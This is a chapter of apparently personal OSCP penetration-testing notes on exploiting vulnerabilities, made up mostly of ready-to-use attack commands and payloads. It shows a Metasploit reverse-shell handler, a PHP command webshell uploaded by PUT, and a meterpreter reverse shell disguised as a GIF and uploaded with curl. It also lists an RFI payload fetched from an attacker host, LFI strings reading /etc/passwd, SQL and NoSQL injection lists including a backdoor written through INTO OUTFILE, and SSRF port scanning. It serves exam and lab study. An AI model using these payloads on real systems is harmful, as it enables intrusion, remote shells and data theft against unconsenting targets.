🌇
oscp
  • Introduction
  • Chapter 1 - Cheatsheets
  • Chapter 2 - Recon & Enumeration
  • Chapter 3 - Exploiting Vulnerabilities
  • Chapter 4 - Windows Post-Exploitation
  • Chapter 5 - Linux Post-Exploitation
  • Chapter 6 - Exploit Development
  • Chapter 7 - Cracking
  • Chapter 8 - Reverse Engineering
  • Chapter 9 - Miscellaneous
Powered by GitBook
On this page
  • Finding Exploits
  • Search Exploit-DB
  • Search Google
  • Search Metasploit
  • Search Vulners
  • Compiling Exploits
  • Compile for Windows
  • Compile for Architectures
  • Catching Exploits
  • Breaking out of Virtualization
  • WebSockets
  • IPV6
  • HTTP
  • Headers
  • Webshells
  • XXE
  • XSS
  • CORS
  • CSRF
  • SSRF
  • RCE
  • Server Side Template Injection
  • API
  • LFI
  • Open Redirects
  • RFI
  • Padding Oracle Attack
  • AWS
  • File Upload
  • E-Mail
  • iSCSI
  • Databases
  • MySQL
  • MSSQL
  • MongoDB
  • PBX
  • Examples

Was this helpful?

Chapter 3 - Exploiting Vulnerabilities

PreviousChapter 2 - Recon & EnumerationNextChapter 4 - Windows Post-Exploitation

Last updated 4 years ago

Was this helpful?

Finding Exploits

Search Exploit-DB

Kali> searchsploit windows 2003 | grep -i local

To quickly view the exploit

Kali> searchsploit -x ######.py

Search Google

Google> site:exploit-db.com exploit kernel <= 3

Search Metasploit

Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*

Search Vulners

Compiling Exploits

Compile for Windows

Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Compile for Architectures

Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)

Catching Exploits

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Breaking out of Virtualization

WebSockets

IPV6

HTTP

Resources

Headers

Find what request methods the web server supports Add the following into your Burp repeater

OPTIONS * HTTP/1.1
...

Send fake IP

Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET

Webshells

PHP CMD Shell

Place in body of a PUT request and give it a file name

PUT /directory/shell.php HTTP/1.1
...

<body>
<?php
Echo exec($_GET[cmd]);
?>

Usage:

Resources

XXE

Resources

XSS

Resources

CORS

Resources

CSRF

Resources

SSRF

Resources

Example

Sometimes what appears to be RFI can lead to SSRF, here are some commands to help

# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ

# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ

RCE

Resources

Server Side Template Injection

Resources

API

Resources

LFI

Resources

Examples

file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
    send post data
expect://whoami

Open Redirects

Resources

RFI

Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt

Padding Oracle Attack

Resources

Arguments

url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt

Examples

Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
                                -cookies "ENC-COOKIE"
                                -plaintext '{"user":"admin","role":"admin"}'

AWS

Resources

File Upload

Make a backdoor GIF

# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif

Upload From CLI

Kali> curl -X POST
                -F "field1=test"
                -F "file=@/home/user/evil.gif"
                http://$TARGET/upload.php
                --cookie "cookie"

E-Mail

Resources

iSCSI

Resources

Databases

MySQL

Resources

Examples

username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'

MSSQL

Resources

MongoDB

Resources

Examples

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);

PBX

Resources

Examples

Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET

Vulners Audit
Breaking into the Data Centre
VENOM Vulnerability
Hacking with WebSockets HTML5
Penetration testing with IPv6
How to pwn things with IPv6
OWASP AppSec Videos
OWASP Testing Guide
Cracking the Lens: Attacking HTTPs hidden attack surface
How I hacked hundreds of companies through their helpdesk
http://victim/directory/shell.php?cmd=whoami
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS Attack: Busting browsers to root
DOM Clobbering
DOM Flow - Untangling the DOM
Exploiting Misconfigured CORS
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
What is Server side Request Forgery?
A New Era of SSRF
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Big List of Naughty Strings
PHP Generic Gadget Chains
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
Cracking & Fixing REST APIs
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Open URL Redirects
Automated Padding Oracle Attacks with Padbuster
AWS PENETRATION TESTING PART 1. S3 BUCKETS
How to Bypass E-Mail gateways using common payloads
An interesting route to domain admin via ISCSI
SQL Injection
SQLMap tricks for advanced SQL injeciton
PenTest & Hack MSSQL
SQL Injection Cheatsheet MSSQL
NoSQL Map
Pentesting VOIP
Introduction to Telephony and PBX